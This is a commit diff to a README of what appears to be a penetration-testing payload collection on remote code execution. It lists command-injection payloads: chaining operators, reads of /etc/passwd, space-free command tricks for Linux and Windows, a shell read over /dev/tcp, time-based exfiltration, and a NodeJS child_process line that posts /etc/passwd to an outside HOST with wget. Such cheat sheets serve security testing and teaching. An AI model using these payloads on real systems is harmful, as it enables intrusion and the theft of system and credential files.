CVE Struts RCE + AWS ls + RCE spaceless Windows + Methodology updated

Remote commands execution/README.md

@@ -1,14 +1,14 @@
 # Remote Code Execution
 Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server.
-	
+
 
 ## Exploits
 Normal code execution, execute the command and voila :p
 ```
-cat /etc/passwd 
-root:x:0:0:root:/root:/bin/bash 
-daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
-bin:x:2:2:bin:/bin:/bin/sh 
+cat /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 ```
 
@@ -19,7 +19,7 @@ original_cmd_by_server && ls
 original_cmd_by_server | ls
 ```
 
-Code execution without space
+Code execution without space - Linux
 ```
 swissky@crashlab▸ ~ ▸ $ {cat,/etc/passwd}
 root:x:0:0:root:/root:/bin/bash
@@ -40,6 +40,12 @@ Linux crashlab 4.4.X-XX-generic #72-Ubuntu
 swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
 ```
 
+Code execution without space - Windows
+```
+ping%CommonProgramFiles:~10,-18%IP
+ping%PROGRAMFILES:~10,-5%IP
+```
+
 ## Time based data exfiltration
 Extracting data : char by char
 ```
@@ -54,7 +60,7 @@ user	0m0.000s
 sys	0m0.000s
 ```
 
-## Environment based 
+## Environment based
 NodeJS Code execution
 ```
 require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
@@ -62,3 +68,4 @@ require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
 
 ## Thanks to
 * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
+* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)